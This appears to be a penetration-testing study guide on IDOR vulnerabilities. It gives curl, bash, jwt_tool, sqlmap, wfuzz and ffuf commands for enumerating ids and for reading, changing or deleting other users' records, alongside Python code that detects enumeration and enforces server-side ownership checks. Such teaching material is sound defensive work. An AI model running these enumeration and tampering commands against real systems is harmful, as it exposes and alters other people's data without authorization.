2. Insecure Direct Object References (IDOR)

1. Introduction to IDOR

Definition:

IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., files, database records) that users can manipulate to access unauthorized data.

Causes:

  • Weak or missing server-side access controls.

  • Developers relying on client-side restrictions instead of enforcing authentication checks.

  • Insecure API endpoints that do not verify user permissions.

Impact:

  • Unauthorized data access (Information Disclosure).

  • Account takeover and privilege escalation.

  • Data modification or deletion.

  • Business logic abuse through chained vulnerabilities.


2. Identifying IDOR Vulnerabilities

Manual URL Parameter Manipulation

curl "http://target.com/documents.php?uid=2"
curl "http://target.com/documents.php?uid=3"

Mass Enumeration (Using curl & grep)

curl -s "http://target.com/documents.php?uid=3" | grep -oP "/documents.*?\.pdf"

Automated Mass IDOR Testing (Bash Script)

#!/bin/bash
# Walk uid=1..10 and download every document link each page exposes.
url="http://target.com"
for i in {1..10}; do
    # The dot before pdf is escaped so the pattern matches a literal ".pdf".
    for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "/documents.*?\.pdf"); do
        wget -q "$url$link"
    done
done

Run the script:

bash ./your_script_name.sh
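The loop above looks very different from the server side: one client touching uid=1, 2, 3, ... within seconds, with a mix of 200 and 403 responses. The following Python is an added example, not code from the original page. It parses a few constructed combined-format access log lines and flags any client whose requests form a near-sequential walk over the uid parameter; the log format, the parameter name and the thresholds (min_run, max_gap) are assumptions a defender would tune to their own environment.

```python
"""Detect sequential object-id enumeration in web server access logs.

Added example, not part of the original page: the log lines below are
constructed, and the parameter name, thresholds and log format are
assumptions a defender would adapt to their own environment.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access log lines. 10.0.0.5 walks uid=1..6 in a
# few seconds (one request was refused); 10.0.0.9 fetches a single document.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /documents.php?uid=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2024:12:00:02 +0000] "GET /documents.php?uid=2 HTTP/1.1" 200 498
10.0.0.5 - - [10/Mar/2024:12:00:02 +0000] "GET /documents.php?uid=3 HTTP/1.1" 200 530
10.0.0.5 - - [10/Mar/2024:12:00:03 +0000] "GET /documents.php?uid=4 HTTP/1.1" 200 511
10.0.0.5 - - [10/Mar/2024:12:00:03 +0000] "GET /documents.php?uid=5 HTTP/1.1" 403 120
10.0.0.5 - - [10/Mar/2024:12:00:04 +0000] "GET /documents.php?uid=6 HTTP/1.1" 200 502
10.0.0.9 - - [10/Mar/2024:12:00:05 +0000] "GET /documents.php?uid=42 HTTP/1.1" 200 600
10.0.0.9 - - [10/Mar/2024:12:05:00 +0000] "GET /documents.php?uid=42 HTTP/1.1" 200 600
"""

# Fields needed from each line: client IP, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict with ip, path, query params and status, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    return {"ip": m.group("ip"), "path": url.path, "params": params,
            "status": int(m.group("status"))}


def longest_near_sequential_run(values, max_gap=1):
    """Length of the longest sorted run in which neighbours differ by at most max_gap."""
    ordered = sorted(values)
    best = run = 1 if ordered else 0
    for prev, cur in zip(ordered, ordered[1:]):
        run = run + 1 if cur - prev <= max_gap else 1
        best = max(best, run)
    return best


def find_enumerators(log_text, param="uid", min_run=4, max_gap=1):
    """Map each client IP that walked at least min_run near-sequential values of
    `param` to the ids it touched and how many of those requests were refused.

    With a per-object authorization check in place a walk becomes a string of
    401/403s; a walk that mostly returns 200 is the sign that the check is missing.
    """
    per_ip = defaultdict(lambda: {"ids": set(), "refused": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or param not in rec["params"]:
            continue
        try:
            value = int(rec["params"][param])
        except ValueError:
            continue  # non-numeric identifiers cannot form a sequential walk
        per_ip[rec["ip"]]["ids"].add(value)
        if rec["status"] in (401, 403):
            per_ip[rec["ip"]]["refused"] += 1
    flagged = {}
    for ip, info in per_ip.items():
        if longest_near_sequential_run(info["ids"], max_gap) >= min_run:
            flagged[ip] = {"ids": sorted(info["ids"]), "refused": info["refused"]}
    return flagged


if __name__ == "__main__":
    for ip, info in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: walked uid {info['ids'][0]}..{info['ids'][-1]} "
              f"({len(info['ids'])} ids, {info['refused']} refused)")
```

The same walk logic applies to any numeric reference (document ids, booking ids, profile ids in REST paths); only the parameter extraction in parse_line needs adapting, and the refused count is what separates a blocked scan from a successful one.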

3. Bypassing Encoded References

Decoding Common Encoding Schemes

Base64 Decode:

echo "MTIzNDU=" | base64 -d

Hex Decode:

echo "3132333435" | xxd -r -p

MD5 Reverse Lookup (hash a candidate value and compare it with the reference the application exposes; only works when the underlying value is guessable)

echo -n "1" | md5sum | awk '{print $1}'

JWT Tampering (Testing for Missing Signature Verification)

Use jwt_tool:

jwt_tool "<JWT_TOKEN>" -d -S none

4. IDOR in APIs

Insecure GET Requests

curl "http://target.com/profile/api.php/profile/2"

Insecure PUT Requests

curl -X PUT -H "Content-Type: application/json" -d '{"uid": 2, "full_name": "New Name"}' "http://target.com/profile/api.php/profile/2"

Insecure DELETE Requests

curl -X DELETE "http://target.com/profile/api.php/profile/11"

5. IDOR in Mobile Apps

Use tools like MobSF and Frida for testing IDOR in mobile applications.

frida -U -n target_app -e "Interceptor.attach(Module.findExportByName(null, 'sendRequest'), {
    onEnter: function(args) {
        console.log('Request:', Memory.readUtf8String(args[1]));
    }
});"

6. Tools for IDOR Exploitation

Burp Suite

  • Burp Intruder (Automated fuzzing)

  • Burp Repeater (Manual testing)

  • Burp Comparer (Response comparison)

ZAP Fuzzer

  • Automated fuzzing and scanning.

SQLMap (For IDOR + SQL Injection):

sqlmap -u "http://target.com/page?id=1" --dbs

Nmap (Port Scanning & Service Detection):

nmap -sV -sC target.com

Gobuster (Directory Brute-Forcing):

gobuster dir -u target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

wfuzz (Fuzzing Parameters):

wfuzz -c -z range,1-100 http://target.com/page?id=FUZZ

Netcat (Manual HTTP Requests):

nc -nv target.com 80
GET /documents.php?uid=2 HTTP/1.1
Host: target.com

ffuf (Fast Fuzzing for APIs & Directories)

ffuf -w wordlist.txt -u http://target.com/api/user/ -X GET -H "Authorization: Bearer TOKEN"

Arjun (Automated Parameter Discovery)

python3 arjun.py -u "http://target.com/api/profile"

7. Prevention & Mitigation

  • Strict Access Control: Ensure every user has proper authentication and authorization.

  • Use UUIDs Instead of Incremental IDs: Avoid predictable identifiers in URLs.

  • Verify Permissions on the Server-Side: Never rely on client-side validation.

  • Use Web Application Firewalls (WAFs): Implement WAFs to detect and block malicious parameter manipulation.

  • Implement Rate Limiting & Logging: Detect mass enumeration attempts in real-time.

  • Penetration Testing: Regularly conduct security audits and tests.
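The first three items above (strict access control, UUIDs instead of incremental ids, server-side permission checks) and the PUT endpoint from section 4 are shown together in the following Python. This is an added example and not the page's own code: the Session and Forbidden types, the in-memory tables and the handler names are assumptions standing in for a real framework's request context and data layer.

```python
"""Server-side authorization on object references: the IDOR and its fix.

Added example, not the original page's code. The in-memory tables,
Session/Forbidden types and handler names are assumptions standing in
for a real framework's request context and data layer.
"""
import uuid
from dataclasses import dataclass


class Forbidden(Exception):
    """The caller may not access the referenced object (the HTTP 403 case)."""


@dataclass(frozen=True)
class Session:
    """Identity established server-side (verified cookie or JWT), never taken from the request body."""
    user_id: int
    is_admin: bool = False


# Constructed sample data keyed by the predictable integers the page enumerates.
DOCUMENTS = {
    1: {"owner": 1, "title": "alice-contract.pdf"},
    2: {"owner": 2, "title": "bob-payslip.pdf"},
}
PROFILES = {
    1: {"uid": 1, "full_name": "Alice"},
    2: {"uid": 2, "full_name": "Bob"},
}
REFERENCES = {}  # opaque UUID string -> internal document id
MUTABLE_PROFILE_FIELDS = {"full_name"}


def _can_access(session, owner_id):
    return session.is_admin or session.user_id == owner_id


def get_document_vulnerable(session, doc_id):
    """The IDOR: the caller is authenticated, but nothing asks who owns doc_id."""
    return DOCUMENTS[doc_id]


def get_document(session, doc_id):
    """Hardened: ownership is checked on the server for every object on every request.
    'Does not exist' and 'not yours' get the same answer, so walking ids cannot
    be used as an existence oracle."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or not _can_access(session, doc["owner"]):
        raise Forbidden(f"document {doc_id} is not accessible to user {session.user_id}")
    return doc


def issue_reference(doc_id):
    """Hand out an unguessable UUID in place of the sequential id."""
    ref = str(uuid.uuid4())
    REFERENCES[ref] = doc_id
    return ref


def get_document_by_reference(session, ref):
    """A UUID stops guessing, not sharing: a leaked reference still has to pass the ownership check."""
    doc_id = REFERENCES.get(ref)
    if doc_id is None:
        raise Forbidden("unknown reference")
    return get_document(session, doc_id)


def update_profile(session, path_uid, body):
    """PUT /profile/<uid>: the target comes from the path and is bound to the session;
    a 'uid' in the JSON body is ignored rather than trusted."""
    if path_uid not in PROFILES or not _can_access(session, path_uid):
        raise Forbidden(f"profile {path_uid} is not writable by user {session.user_id}")
    profile = PROFILES[path_uid]
    for key, value in body.items():
        if key in MUTABLE_PROFILE_FIELDS:
            profile[key] = value
    return profile


def denied(fn, *args):
    """True if the handler refuses the call; used to exercise the checks above."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    alice, bob = Session(1), Session(2)
    print("vulnerable:", get_document_vulnerable(alice, 2)["title"])     # Bob's document leaks
    print("hardened:  ", denied(get_document, alice, 2))                 # True
    print("leaked ref:", denied(get_document_by_reference, alice, issue_reference(2)))  # True
    print("body uid:  ", update_profile(bob, 2, {"uid": 1, "full_name": "New Name"}))
```

Two design choices matter here. The ownership check lives next to the data access, not in a front controller or WAF rule, so every code path that resolves an id goes through it; and the UUID indirection is layered on top of that check rather than replacing it, because an opaque identifier only removes predictability and does nothing once it has been shared or logged.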


8. Real-World Examples of IDOR Exploitation

  • Facebook’s $40,000 IDOR Bug Bounty (2019): A researcher found an IDOR allowing deletion of live videos from any user account.

  • Uber’s 2017 IDOR Vulnerability: Attackers could access private ride details by modifying booking IDs.

  • Snapchat’s 2018 IDOR Flaw: Researchers bypassed authentication to access private user metadata.


9. Key Takeaways

  • IDOR vulnerabilities arise from missing access controls on object references.

  • Attackers exploit predictable identifiers, insecure API endpoints, and weak encoding mechanisms.

  • Automated tools like Burp, ffuf, Arjun, and SQLMap help identify and exploit IDOR vulnerabilities.

  • Prevention requires secure coding practices, server-side validation, and UUID usage.

  • Regular penetration testing is critical to prevent unauthorized access to sensitive data.
